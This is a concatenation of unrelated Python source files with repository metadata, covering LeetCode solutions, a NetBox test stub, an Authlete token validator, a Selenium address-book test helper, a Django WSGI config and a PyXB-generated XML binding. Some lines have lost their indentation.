    if found == 0:
        print("Element not in array")
175cda87c4e862ebe6a4d0796d91303c1161bbbf | 1,937 | py | Python | leetcode_python/Hash_table/card-flipping-game.py | yennanliu/Python_basics | 6a597442d39468295946cefbfb11d08f61424dc3 | [
"Unlicense"
] | 18 | 2019-08-01T07:45:02.000Z | 2022-03-31T18:05:44.000Z | leetcode_python/Hash_table/card-flipping-game.py | yennanliu/Python_basics | 6a597442d39468295946cefbfb11d08f61424dc3 | [
"Unlicense"
] | null | null | null | leetcode_python/Hash_table/card-flipping-game.py | yennanliu/Python_basics | 6a597442d39468295946cefbfb11d08f61424dc3 | [
"Unlicense"
] | 15 | 2019-12-29T08:46:20.000Z | 2022-03-08T14:14:05.000Z | # V0
# V1
# http://bookshadow.com/weblog/2018/04/22/leetcode-card-flipping-game/
# IDEA : GREEDY
class Solution(object):
    def flipgame(self, fronts, backs):
        """Return the smallest value that is not shown on both sides of any
        single card, or 0 when every value is blocked.

        :type fronts: List[int]
        :type backs: List[int]
        :rtype: int
        """
        for candidate in sorted(set(fronts) | set(backs)):
            # A candidate is usable unless some card has it on both faces.
            if not any(f == candidate and b == candidate
                       for f, b in zip(fronts, backs)):
                return candidate
        return 0
# V1'
# https://blog.csdn.net/fuxuemingzhu/article/details/82861796
class Solution:
    def flipgame(self, fronts, backs):
        """Return the minimum value not pinned by a card that shows it on
        both faces; 0 when no such value exists.

        :type fronts: List[int]
        :type backs: List[int]
        :rtype: int
        """
        # Values printed on both sides of one card can never be hidden.
        pinned = {front for front, back in zip(fronts, backs) if front == back}
        candidates = [value for value in fronts + backs if value not in pinned]
        return min(candidates) if candidates else 0
# V1'
# https://www.jiuzhang.com/solution/card-flipping-game/#tag-highlight-lang-python
class Solution:
    """
    @param fronts:
    @param backs:
    @return: the minimum value that can face down on some card while facing
        up on none, across all flip choices; 0 when no value qualifies
    """
    def flipgame(self, f, b):
        # A value printed on both sides of one card can never be hidden.
        blocked = set()
        for front, back in zip(f, b):
            if front == back:
                blocked.add(front)
        usable = [value for value in f + b if value not in blocked]
        return min(usable) if usable else 0
# V2
# Time: O(n)
# Space: O(n)
import itertools
class Solution(object):
    def flipgame(self, fronts, backs):
        """
        :type fronts: List[int]
        :type backs: List[int]
        :rtype: int
        """
        # Cards showing the same value on both faces block that value.
        blocked = {value for i, value in enumerate(fronts) if value == backs[i]}
        best = float("inf")
        for value in list(fronts) + list(backs):
            if value not in blocked:
                best = min(best, value)
        return 0 if best == float("inf") else best
dfa24d88fb0f3f9375e5185d48fde8c126c8155a | 885 | py | Python | test/test_inline_response20045.py | nrfta/python-netbox-client | 68ba6dd4d7306513dc1ad38f3ac59122ba4f70a8 | [
"MIT"
] | null | null | null | test/test_inline_response20045.py | nrfta/python-netbox-client | 68ba6dd4d7306513dc1ad38f3ac59122ba4f70a8 | [
"MIT"
] | null | null | null | test/test_inline_response20045.py | nrfta/python-netbox-client | 68ba6dd4d7306513dc1ad38f3ac59122ba4f70a8 | [
"MIT"
] | null | null | null | # coding: utf-8
"""
NetBox API
API to access NetBox # noqa: E501
OpenAPI spec version: 2.8
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
import unittest
import netbox_client
from netbox_client.models.inline_response20045 import InlineResponse20045 # noqa: E501
from netbox_client.rest import ApiException
class TestInlineResponse20045(unittest.TestCase):
    """InlineResponse20045 unit test stubs

    Auto-generated placeholder suite for the swagger model
    ``InlineResponse20045``; the single test below is still a stub.
    """
    def setUp(self):
        # No per-test fixtures are needed yet.
        pass
    def tearDown(self):
        # Nothing to release.
        pass
    def testInlineResponse20045(self):
        """Test InlineResponse20045"""
        # FIXME: construct object with mandatory attributes with example values
        # model = netbox_client.models.inline_response20045.InlineResponse20045()  # noqa: E501
        pass
if __name__ == '__main__':
unittest.main()
| 21.585366 | 95 | 0.709605 |
d842f8a7f8056f440f893bb3c774df5137d3126a | 8,828 | py | Python | authlete/django/web/access_token_validator.py | authlete/authlete-python-django | ccdfecbac5205a7ed7c14186b5ea4552fd390d2c | [
"Apache-2.0"
] | 6 | 2019-08-10T03:07:05.000Z | 2020-11-06T13:59:29.000Z | authlete/django/web/access_token_validator.py | authlete/authlete-python-django | ccdfecbac5205a7ed7c14186b5ea4552fd390d2c | [
"Apache-2.0"
] | null | null | null | authlete/django/web/access_token_validator.py | authlete/authlete-python-django | ccdfecbac5205a7ed7c14186b5ea4552fd390d2c | [
"Apache-2.0"
] | null | null | null | #
# Copyright (C) 2019 Authlete, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND,
# either express or implied. See the License for the specific
# language governing permissions and limitations under the
# License.
from authlete.django.web.response_utility import ResponseUtility
from authlete.dto.introspection_action import IntrospectionAction
from authlete.dto.introspection_request import IntrospectionRequest
class AccessTokenValidator(object):
    """Validates access tokens via Authlete's /api/auth/introspection API and
    translates failures into RFC 6750-compliant error responses."""

    def __init__(self, api):
        """
        Args:
            api: Authlete API caller; must provide an
                ``introspection(request)`` method.
        """
        super().__init__()
        self._api = api
        self.__resetValidation()

    def __resetValidation(self):
        # Drop the outcome of any previous validate() call.
        self._valid = False
        self._introspectionResponse = None
        self._introspectionException = None
        self._errorResponse = None

    @property
    def api(self):
        # The Authlete API caller given to the constructor.
        return self._api

    @property
    def valid(self):
        """Get the result of the access token validation.

        After a call of `validate()` method, this property holds the same
        value as was returned from `validate()`.

        Returns:
            bool : The result of the access token validation.
        """
        return self._valid

    @property
    def introspectionResponse(self):
        """Get the response from Authlete's /api/auth/introspection API.

        Set by `validate()` on success; remains `None` when the API call
        threw an exception (see `introspectionException`). Reset to `None`
        on entry of `validate()`.

        Returns:
            authlete.dto.IntrospectionResponse
        """
        return self._introspectionResponse

    @property
    def introspectionException(self):
        """Get the exception raised by the /api/auth/introspection API call.

        Remains `None` when the API call succeeds (see
        `introspectionResponse`). Reset to `None` on entry of `validate()`.

        Returns:
            Exception
        """
        return self._introspectionException

    @property
    def errorResponse(self):
        """Get the error response that should be sent back to the client.

        Set by `validate()` when it returns `False`; the response complies
        with RFC 6750 (Bearer Token Usage). Reset to `None` on entry of
        `validate()`.

        Returns:
            django.http.HttpResponse
        """
        return self._errorResponse

    def validate(self, accessToken, requiredScopes=None, requiredSubject=None):
        """Validate an access token.

        On entry the `valid`, `introspectionResponse`,
        `introspectionException` and `errorResponse` properties are reset.
        Then Authlete's /api/auth/introspection API is called and its outcome
        is recorded in those properties:

        * API call failed -> `introspectionException` and a 500
          `errorResponse` are set; returns `False`.
        * API call succeeded with action `OK` -> returns `True`.
        * Any other action -> an RFC 6750 `errorResponse` is set;
          returns `False`.

        Args:
            accessToken (str): An access token to be validated.
            requiredScopes (list of str): Scopes the access token must
                cover; no scope validation is performed when `None`.
            requiredSubject (str): Subject (unique end-user identifier) the
                access token must be associated with; no subject validation
                is performed when `None`.

        Returns:
            bool: The result of access token validation.
        """
        # Reset properties that may have been set by the previous call.
        self.__resetValidation()

        try:
            # Call Authlete's /api/auth/introspection API.
            self._introspectionResponse = self.__callIntrospectionApi(
                accessToken, requiredScopes, requiredSubject)
        except Exception as cause:
            # The introspection call itself failed; report 500 to the client.
            self._introspectionException = cause
            self._errorResponse = self.__buildErrorFromException(cause)
            self._valid = False
            return False

        # The 'action' parameter in the response from /api/auth/introspection
        # denotes the next action that the API caller should take.
        if self._introspectionResponse.action == IntrospectionAction.OK:
            # The access token is valid.
            self._valid = True
            return True

        self._errorResponse = self.__buildErrorFromResponse(self._introspectionResponse)
        self._valid = False
        return False

    def __callIntrospectionApi(self, accessToken, requiredScopes, requiredSubject):
        # Prepare a request to /api/auth/introspection API.
        req = IntrospectionRequest()
        req.token = accessToken
        req.scopes = requiredScopes
        req.subject = requiredSubject

        # Call /api/auth/introspection API.
        return self.api.introspection(req)

    def __buildErrorFromException(self, cause):
        # The value for the WWW-Authenticate header.
        challenge = 'Bearer error="server_error",error_description="Introspection API call failed."'

        # Build a response that complies with RFC 6750.
        return ResponseUtility.wwwAuthenticate(500, challenge)

    def __buildErrorFromResponse(self, response):
        # Map the introspection 'action' to an HTTP status code; any
        # unrecognized action falls back to 500, as before.
        statusCode = {
            IntrospectionAction.INTERNAL_SERVER_ERROR: 500,
            IntrospectionAction.BAD_REQUEST: 400,
            IntrospectionAction.UNAUTHORIZED: 401,
            IntrospectionAction.FORBIDDEN: 403,
        }.get(response.action, 500)

        # In error cases, the 'responseContent' parameter in the response
        # from Authlete's /api/auth/introspection API contains a value for
        # the WWW-Authenticate header.
        challenge = response.responseContent

        # Build a response that complies with RFC 6750.
        return ResponseUtility.wwwAuthenticate(statusCode, challenge)
70518292d721c752d4af7eb3883098a70522725a | 10,519 | py | Python | fixture/contact.py | MsScribe/python_training | b25593e3c17710f055d8dd48678df2a7deead4f6 | [
"Apache-2.0"
] | null | null | null | fixture/contact.py | MsScribe/python_training | b25593e3c17710f055d8dd48678df2a7deead4f6 | [
"Apache-2.0"
] | null | null | null | fixture/contact.py | MsScribe/python_training | b25593e3c17710f055d8dd48678df2a7deead4f6 | [
"Apache-2.0"
] | null | null | null | from model.contact import ContactMainInfo
from selenium.webdriver.support.select import Select
import re
import random
class ContactHelper:
def __init__(self, app):
self.app = app
def open_contact_page(self):
wd = self.app.wd
if not (wd.current_url.endswith("/addressbook/") and len(wd.find_elements_by_link_text("Send e-Mail")) > 0):
wd.find_element_by_xpath("//a[text()='home']").click()
def change_field_value(self, field_name, text):
wd = self.app.wd
if text is not None:
wd.find_element_by_name(field_name).click()
wd.find_element_by_name(field_name).clear()
wd.find_element_by_name(field_name).send_keys(text)
def change_field_value_day(self, field_date, date):
wd = self.app.wd
if date is not None:
wd.find_element_by_name(field_date).click()
Select(wd.find_element_by_name(field_date)).select_by_visible_text(date)
wd.find_element_by_xpath("//option[@value='" + date + "']").click()
def fill_contact_form(self, contactmaininfo):
# fill contact main information
self.change_field_value("firstname", contactmaininfo.firstname)
self.change_field_value("middlename", contactmaininfo.middlename)
self.change_field_value("lastname", contactmaininfo.lastname)
self.change_field_value("nickname", contactmaininfo.nickname)
self.change_field_value("title", contactmaininfo.title)
self.change_field_value("company", contactmaininfo.company)
self.change_field_value("address", contactmaininfo.homeaddress)
# fill contact phone information
self.change_field_value("home", contactmaininfo.homephone)
self.change_field_value("mobile", contactmaininfo.mobilephone)
self.change_field_value("work", contactmaininfo.workphone)
self.change_field_value("fax", contactmaininfo.faxphone)
# fill contact email information
self.change_field_value("email", contactmaininfo.email)
self.change_field_value("email2", contactmaininfo.email2)
self.change_field_value("email3", contactmaininfo.email3)
# fill contact homepage
self.change_field_value("homepage", contactmaininfo.homepage)
# fill contact bday information
self.change_field_value_day("bday", contactmaininfo.bday)
self.change_field_value_day("bmonth", contactmaininfo.bmonth)
self.change_field_value("byear", contactmaininfo.byear)
# fill contact anniversary
self.change_field_value_day("aday", contactmaininfo.aday)
self.change_field_value_day("amonth", contactmaininfo.amonth)
self.change_field_value("ayear", contactmaininfo.ayear)
# fill contact secondary information
self.change_field_value("address2", contactmaininfo.address2)
self.change_field_value("phone2", contactmaininfo.phone2)
self.change_field_value("notes", contactmaininfo.notes)
def select_group(self, group_name):
wd = self.app.wd
wd.find_element_by_name("new_group").click()
Select(wd.find_element_by_name("new_group")).select_by_visible_text(group_name)
def create(self, contactmaininfo):
wd = self.app.wd
self.open_contact_page()
# open create new contact
wd.find_element_by_link_text("add new").click()
self.fill_contact_form(contactmaininfo)
# submit contact creation
wd.find_element_by_xpath("(//input[@name='submit'])[2]").click()
self.open_contact_page()
self.contact_cache = None
def create_in_group(self, contactmaininfo, group_name):
wd = self.app.wd
self.open_contact_page()
# open create new contact
wd.find_element_by_link_text("add new").click()
self.fill_contact_form(contactmaininfo)
self.select_group(group_name)
# submit contact creation
wd.find_element_by_xpath("(//input[@name='submit'])[2]").click()
self.open_contact_page()
self.contact_cache = None
def connect_in_group(self, contact_id, group_id):
wd = self.app.wd
self.open_contact_page()
# Выбрать контакт без группы
wd.find_element_by_css_selector("input[value='%s']" % contact_id).click()
# Выбрать группу без контакта
wd.find_element_by_name("to_group").click()
Select(wd.find_element_by_name("to_group")).select_by_value(group_id)
# Сохранить
wd.find_element_by_name("add").click()
def open_contact_to_edit_by_index(self, index):
wd = self.app.wd
# open edit contact
wd.find_elements_by_xpath("//img[@alt='Edit']")[index].click()
def open_contact_to_edit_by_id(self, id):
wd = self.app.wd
# open edit contact
wd.find_element_by_css_selector("a[href='edit.php?id=%s']" % id).click()
def open_contact_to_view_by_index(self, index):
wd = self.app.wd
self.open_contact_page()
wd.find_elements_by_xpath("//td[7]/a")[index].click()
def modify_contact_by_index(self, index, contactmaininfo):
wd = self.app.wd
self.open_contact_page()
self.open_contact_to_edit_by_index(index)
self.fill_contact_form(contactmaininfo)
# submit contact creation
wd.find_element_by_name("update").click()
self.open_contact_page()
self.contact_cache = None
def modify_contact_by_id(self, id, contactmaininfo):
wd = self.app.wd
self.open_contact_page()
self.open_contact_to_edit_by_id(id)
self.fill_contact_form(contactmaininfo)
# submit contact creation
wd.find_element_by_name("update").click()
self.open_contact_page()
self.contact_cache = None
def modify_first_contact(self):
self.modify_contact_by_index(0)
def delete_contact_by_index(self, index):
wd = self.app.wd
self.open_contact_page()
# open edit contact
wd.find_elements_by_xpath("//img[@alt='Edit']")[index].click()
# delete contact
wd.find_element_by_xpath("//input[@value='Delete']").click()
self.open_contact_page()
self.contact_cache = None
def select_contact_by_id(self, id):
wd = self.app.wd
wd.find_element_by_css_selector("input[value='%s']" % id).click()
def delete_contact_by_id(self, id):
wd = self.app.wd
self.open_contact_page()
self.select_contact_by_id(id)
wd.find_element_by_xpath("//input[@value='Delete']").click()
wd.switch_to_alert().accept()
self.open_contact_page()
self.contact_cache = None
def delete_first_contact(self):
self.delete_contact_by_index(0)
def count(self):
wd = self.app.wd
self.open_contact_page()
return len(wd.find_elements_by_xpath("//img[@alt='Edit']"))
contact_cache = None
def get_contact_list(self):
if self.contact_cache is None:
wd = self.app.wd
self.open_contact_page()
self.contact_cache = []
count = len(wd.find_elements_by_xpath("//input[@name='selected[]']"))
for i in range(2, count+2):
lastname = wd.find_element_by_xpath("//tr[" + str(i) + "]//input[@name='selected[]']/../../td[2]").text
firstname = wd.find_element_by_xpath("//tr[" + str(i) + "]//input[@name='selected[]']/../../td[3]").text
id = wd.find_element_by_xpath("//tr[" + str(i) + "]//input[@name='selected[]']").get_attribute("value")
all_phones = wd.find_element_by_xpath("//tr[" + str(i) + "]//input[@name='selected[]']/../../td[6]").text
all_emails = wd.find_element_by_xpath("//tr[" + str(i) + "]//input[@name='selected[]']/../../td[5]").text
address = wd.find_element_by_xpath("//tr[" + str(i) + "]//input[@name='selected[]']/../../td[4]").text
self.contact_cache.append(ContactMainInfo(id=id, firstname=firstname, lastname=lastname, all_phones_from_home_page=clear(all_phones), all_emails_from_home_page=clear(all_emails), homeaddress=address))
return list(self.contact_cache)
def get_contact_info_from_edit_page(self, index):
    # Open the edit form of the contact at *index* and scrape its fields.
    self.open_contact_page()
    self.open_contact_to_edit_by_index(index)
    return self.get_contact_info()
def get_contact_info(self):
    """Scrape the currently open contact edit form into a ContactMainInfo."""
    wd = self.app.wd

    def field(name):
        # Every datum lives in the "value" attribute of a named <input>.
        return wd.find_element_by_name(name).get_attribute("value")

    return ContactMainInfo(
        id=field("id"),
        firstname=field("firstname"),
        lastname=field("lastname"),
        homephone=field("home"),
        mobilephone=field("mobile"),
        workphone=field("work"),
        phone2=field("phone2"),
        email=field("email"),
        email2=field("email2"),
        email3=field("email3"),
        homeaddress=field("address"))
def get_contact_from_view_page(self, index):
    """Extract the phone numbers from a contact's read-only view page."""
    wd = self.app.wd
    self.open_contact_to_view_by_index(index)
    text = wd.find_element_by_id("content").text

    def phone(prefix):
        # Each number is rendered on its own line, e.g. "H: 12345".
        # Raises AttributeError (as the original did) if the line is absent.
        return re.search(prefix + ": (.*)", text).group(1)

    return ContactMainInfo(homephone=phone("H"), mobilephone=phone("M"),
                           workphone=phone("W"), phone2=phone("P"))
def clear(s):
    """Strip formatting characters from a phone/e-mail string.

    Removes parentheses, spaces, newlines and dashes so that values scraped
    from different pages can be compared verbatim.

    Bug fix: the previous pattern "[() - \n]" placed "-" between two spaces,
    so the regex engine parsed it as the degenerate range ' '-' ' and dashes
    were never actually removed.  Placing "-" last makes it a literal.
    """
    return re.sub("[() \n-]", "", s)
def merge_phones_like_on_home_page(contact):
    """Join the contact's phone fields the way the home page renders them."""
    candidates = [contact.all_phones, contact.mobilephone,
                  contact.workphone, contact.phone2]
    # Drop missing fields, normalise formatting, then drop empty results.
    cleaned = [clear(value) for value in candidates if value is not None]
    return "\n".join(number for number in cleaned if number != "")
def merge_emails_like_on_home_page(contact):
    """Join the contact's e-mail fields the way the home page renders them."""
    candidates = [contact.email, contact.email2, contact.email3]
    # Drop missing fields, normalise formatting, then drop empty results.
    cleaned = [clear(value) for value in candidates if value is not None]
    return "\n".join(address for address in cleaned if address != "")
9e2073599f44298ffdd12606cb023cb625646a8d | 1,667 | py | Python | config/wsgi.py | kingsdigitallab/tvof-django | 12cb0aec4e155345a13602c7d7dfd0882ec92129 | [
"MIT"
] | null | null | null | config/wsgi.py | kingsdigitallab/tvof-django | 12cb0aec4e155345a13602c7d7dfd0882ec92129 | [
"MIT"
] | 33 | 2019-12-04T22:37:50.000Z | 2022-02-10T07:15:35.000Z | config/wsgi.py | kingsdigitallab/tvof-django | 12cb0aec4e155345a13602c7d7dfd0882ec92129 | [
"MIT"
] | null | null | null | """
WSGI config for The Values of French project.
This module contains the WSGI application used by Django's development server
and any production WSGI deployments. It should expose a module-level variable
named ``application``. Django's ``runserver`` and ``runfcgi`` commands discover
this application via the ``WSGI_APPLICATION`` setting.
Usually you will have the standard Django WSGI application here, but it also
might make sense to replace the whole Django WSGI application with a custom one
that later delegates to the Django one. For example, you could introduce WSGI
middleware here, or combine a Django application with an application of another
framework.
"""
import os
import sys
from pathlib import Path

from django.core.wsgi import get_wsgi_application

# This allows easy placement of apps within the interior
# tvof directory.
ROOT_DIR = Path(__file__).resolve(strict=True).parent.parent
sys.path.append(str(ROOT_DIR / "tvof"))

# We defer to a DJANGO_SETTINGS_MODULE already in the environment. This breaks
# if running multiple sites in the same mod_wsgi process. To fix this, use
# mod_wsgi daemon mode with each site in its own daemon process, or use
# os.environ["DJANGO_SETTINGS_MODULE"] = "config.settings.production"
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "config.settings.production")

# This application object is used by any WSGI server configured to use this
# file. This includes Django's development server, if the WSGI_APPLICATION
# setting points here.
application = get_wsgi_application()

# Apply WSGI middleware here.
# from helloworld.wsgi import HelloWorldApplication
# application = HelloWorldApplication(application)
| 42.74359 | 79 | 0.80144 |
7db00635d2543683eebdc9111a116ad1e0ae8d7f | 27,618 | py | Python | pybrreg/xml/generated/manifest.py | unicornis/pybrreg | ecb471065795ae4bba1d5b3466756df8e8db848e | [
"MIT"
] | null | null | null | pybrreg/xml/generated/manifest.py | unicornis/pybrreg | ecb471065795ae4bba1d5b3466756df8e8db848e | [
"MIT"
] | null | null | null | pybrreg/xml/generated/manifest.py | unicornis/pybrreg | ecb471065795ae4bba1d5b3466756df8e8db848e | [
"MIT"
] | null | null | null | # ./manifest.py
# -*- coding: utf-8 -*-
# PyXB bindings for NM:c3674a9b44a4a4edf84a5ac08485c938ac789a94
# Generated 2016-08-10 10:54:40.034890 by PyXB version 1.2.4 using Python 2.7.5.final.0
# Namespace http://schema.altinn.no/services/ServiceEngine/Broker/2015/06
from __future__ import unicode_literals
import pyxb
import pyxb.binding
import pyxb.binding.saxer
import io
import pyxb.utils.utility
import pyxb.utils.domutils
import sys
import pyxb.utils.six as _six
# Unique identifier for bindings created at the same time
# NOTE: PyXB-generated module setup — regenerate from the XSD rather than
# editing by hand.
# Unique identifier for bindings created at the same time
_GenerationUID = pyxb.utils.utility.UniqueIdentifier('urn:uuid:129fbad8-5ed8-11e6-af5b-eca86bfbeec6')

# Version of PyXB used to generate the bindings
_PyXBVersion = '1.2.4'
# Generated bindings are not compatible across PyXB versions
if pyxb.__version__ != _PyXBVersion:
    raise pyxb.PyXBVersionError(_PyXBVersion)

# Import bindings for namespaces imported into schema
import pyxb.binding.datatypes

# NOTE: All namespace declarations are reserved within the binding
Namespace = pyxb.namespace.NamespaceForURI('http://schema.altinn.no/services/ServiceEngine/Broker/2015/06', create_if_missing=True)
Namespace.configureCategories(['typeBinding', 'elementBinding'])
# NOTE: PyXB-generated entry point — regenerate rather than hand-edit.
def CreateFromDocument (xml_text, default_namespace=None, location_base=None):
    """Parse the given XML and use the document element to create a
    Python instance.
    @param xml_text An XML document. This should be data (Python 2
    str or Python 3 bytes), or a text (Python 2 unicode or Python 3
    str) in the L{pyxb._InputEncoding} encoding.
    @keyword default_namespace The L{pyxb.Namespace} instance to use as the
    default namespace where there is no default namespace in scope.
    If unspecified or C{None}, the namespace of the module containing
    this function will be used.
    @keyword location_base: An object to be recorded as the base of all
    L{pyxb.utils.utility.Location} instances associated with events and
    objects handled by the parser. You might pass the URI from which
    the document was obtained.
    """
    # Fall back to the DOM-based path when the SAX style is not selected.
    if pyxb.XMLStyle_saxer != pyxb._XMLStyle:
        dom = pyxb.utils.domutils.StringToDOM(xml_text)
        return CreateFromDOM(dom.documentElement, default_namespace=default_namespace)
    if default_namespace is None:
        default_namespace = Namespace.fallbackNamespace()
    saxer = pyxb.binding.saxer.make_parser(fallback_namespace=default_namespace, location_base=location_base)
    handler = saxer.getContentHandler()
    xmld = xml_text
    # The SAX parser wants bytes; encode text input first.
    if isinstance(xmld, _six.text_type):
        xmld = xmld.encode(pyxb._InputEncoding)
    saxer.parse(io.BytesIO(xmld))
    instance = handler.rootObject()
    return instance
# NOTE: PyXB-generated entry point — regenerate rather than hand-edit.
def CreateFromDOM (node, default_namespace=None):
    """Create a Python instance from the given DOM node.
    The node tag must correspond to an element declaration in this module.
    @deprecated: Forcing use of DOM interface is unnecessary; use L{CreateFromDocument}."""
    if default_namespace is None:
        default_namespace = Namespace.fallbackNamespace()
    return pyxb.binding.basis.element.AnyCreateFromDOM(node, default_namespace)
# Complex type [anonymous] with content type ELEMENT_ONLY
# NOTE: PyXB-generated binding class for the BrokerServiceManifest root
# element — regenerate from the XSD rather than editing by hand.
class CTD_ANON (pyxb.binding.basis.complexTypeDefinition):
    """This type is the manifest root element. The container of all the file meta-data."""
    _TypeDefinition = None
    _ContentTypeTag = pyxb.binding.basis.complexTypeDefinition._CT_ELEMENT_ONLY
    _Abstract = False
    _ExpandedName = None
    _XSDLocation = pyxb.utils.utility.Location('xsd/Manifest.xsd', 8, 2)
    _ElementMap = {}
    _AttributeMap = {}
    # Base type is pyxb.binding.datatypes.anyType

    # Element {http://schema.altinn.no/services/ServiceEngine/Broker/2015/06}ExternalServiceCode uses Python identifier ExternalServiceCode
    __ExternalServiceCode = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'ExternalServiceCode'), 'ExternalServiceCode', '__httpschema_altinn_noservicesServiceEngineBroker201506_CTD_ANON_httpschema_altinn_noservicesServiceEngineBroker201506ExternalServiceCode', False, pyxb.utils.utility.Location('xsd/Manifest.xsd', 13, 4), )

    ExternalServiceCode = property(__ExternalServiceCode.value, __ExternalServiceCode.set, None, 'This property should hold the service code of the BrokerService being used. Value is required.')

    # Element {http://schema.altinn.no/services/ServiceEngine/Broker/2015/06}ExternalServiceEditionCode uses Python identifier ExternalServiceEditionCode
    __ExternalServiceEditionCode = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'ExternalServiceEditionCode'), 'ExternalServiceEditionCode', '__httpschema_altinn_noservicesServiceEngineBroker201506_CTD_ANON_httpschema_altinn_noservicesServiceEngineBroker201506ExternalServiceEditionCode', False, pyxb.utils.utility.Location('xsd/Manifest.xsd', 18, 4), )

    ExternalServiceEditionCode = property(__ExternalServiceEditionCode.value, __ExternalServiceEditionCode.set, None, 'This property should hold the service edition code of the BrokerService being used. Value is required.')

    # Element {http://schema.altinn.no/services/ServiceEngine/Broker/2015/06}SendersReference uses Python identifier SendersReference
    __SendersReference = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'SendersReference'), 'SendersReference', '__httpschema_altinn_noservicesServiceEngineBroker201506_CTD_ANON_httpschema_altinn_noservicesServiceEngineBroker201506SendersReference', False, pyxb.utils.utility.Location('xsd/Manifest.xsd', 23, 4), )

    SendersReference = property(__SendersReference.value, __SendersReference.set, None, 'This property should hold a reference value defined by the file creator. Value is required.')

    # Element {http://schema.altinn.no/services/ServiceEngine/Broker/2015/06}Reportee uses Python identifier Reportee
    __Reportee = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'Reportee'), 'Reportee', '__httpschema_altinn_noservicesServiceEngineBroker201506_CTD_ANON_httpschema_altinn_noservicesServiceEngineBroker201506Reportee', False, pyxb.utils.utility.Location('xsd/Manifest.xsd', 28, 4), )

    Reportee = property(__Reportee.value, __Reportee.set, None, 'This property will hold the organization number or social security number of the file source. Value is required.')

    # Element {http://schema.altinn.no/services/ServiceEngine/Broker/2015/06}SentDate uses Python identifier SentDate
    __SentDate = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'SentDate'), 'SentDate', '__httpschema_altinn_noservicesServiceEngineBroker201506_CTD_ANON_httpschema_altinn_noservicesServiceEngineBroker201506SentDate', False, pyxb.utils.utility.Location('xsd/Manifest.xsd', 33, 4), )

    SentDate = property(__SentDate.value, __SentDate.set, None, 'This property will hold the date and time for when the file was received in Altinn. Property value is added by Altinn.')

    # Element {http://schema.altinn.no/services/ServiceEngine/Broker/2015/06}FileList uses Python identifier FileList
    __FileList = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'FileList'), 'FileList', '__httpschema_altinn_noservicesServiceEngineBroker201506_CTD_ANON_httpschema_altinn_noservicesServiceEngineBroker201506FileList', False, pyxb.utils.utility.Location('xsd/Manifest.xsd', 38, 4), )

    FileList = property(__FileList.value, __FileList.set, None, None)

    # Element {http://schema.altinn.no/services/ServiceEngine/Broker/2015/06}PropertyList uses Python identifier PropertyList
    __PropertyList = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'PropertyList'), 'PropertyList', '__httpschema_altinn_noservicesServiceEngineBroker201506_CTD_ANON_httpschema_altinn_noservicesServiceEngineBroker201506PropertyList', False, pyxb.utils.utility.Location('xsd/Manifest.xsd', 66, 4), )

    PropertyList = property(__PropertyList.value, __PropertyList.set, None, None)

    _ElementMap.update({
        __ExternalServiceCode.name() : __ExternalServiceCode,
        __ExternalServiceEditionCode.name() : __ExternalServiceEditionCode,
        __SendersReference.name() : __SendersReference,
        __Reportee.name() : __Reportee,
        __SentDate.name() : __SentDate,
        __FileList.name() : __FileList,
        __PropertyList.name() : __PropertyList
    })
    _AttributeMap.update({
    })
# Complex type [anonymous] with content type ELEMENT_ONLY
# NOTE: PyXB-generated binding class for the FileList container —
# regenerate from the XSD rather than editing by hand.
class CTD_ANON_ (pyxb.binding.basis.complexTypeDefinition):
    """This property should hold a list of the files included in the shipment. This is optional."""
    _TypeDefinition = None
    _ContentTypeTag = pyxb.binding.basis.complexTypeDefinition._CT_ELEMENT_ONLY
    _Abstract = False
    _ExpandedName = None
    _XSDLocation = pyxb.utils.utility.Location('xsd/Manifest.xsd', 39, 5)
    _ElementMap = {}
    _AttributeMap = {}
    # Base type is pyxb.binding.datatypes.anyType

    # Element {http://schema.altinn.no/services/ServiceEngine/Broker/2015/06}File uses Python identifier File
    __File = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'File'), 'File', '__httpschema_altinn_noservicesServiceEngineBroker201506_CTD_ANON__httpschema_altinn_noservicesServiceEngineBroker201506File', True, pyxb.utils.utility.Location('xsd/Manifest.xsd', 44, 7), )

    File = property(__File.value, __File.set, None, None)

    _ElementMap.update({
        __File.name() : __File
    })
    _AttributeMap.update({
    })
# Complex type [anonymous] with content type ELEMENT_ONLY
# NOTE: PyXB-generated binding class for a single File entry —
# regenerate from the XSD rather than editing by hand.
class CTD_ANON_2 (pyxb.binding.basis.complexTypeDefinition):
    """This property should hold information about a file in the package."""
    _TypeDefinition = None
    _ContentTypeTag = pyxb.binding.basis.complexTypeDefinition._CT_ELEMENT_ONLY
    _Abstract = False
    _ExpandedName = None
    _XSDLocation = pyxb.utils.utility.Location('xsd/Manifest.xsd', 45, 8)
    _ElementMap = {}
    _AttributeMap = {}
    # Base type is pyxb.binding.datatypes.anyType

    # Element {http://schema.altinn.no/services/ServiceEngine/Broker/2015/06}FileName uses Python identifier FileName
    __FileName = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'FileName'), 'FileName', '__httpschema_altinn_noservicesServiceEngineBroker201506_CTD_ANON_2_httpschema_altinn_noservicesServiceEngineBroker201506FileName', False, pyxb.utils.utility.Location('xsd/Manifest.xsd', 50, 10), )

    FileName = property(__FileName.value, __FileName.set, None, 'This property should hold the name of the file.')

    # Element {http://schema.altinn.no/services/ServiceEngine/Broker/2015/06}CheckSum uses Python identifier CheckSum
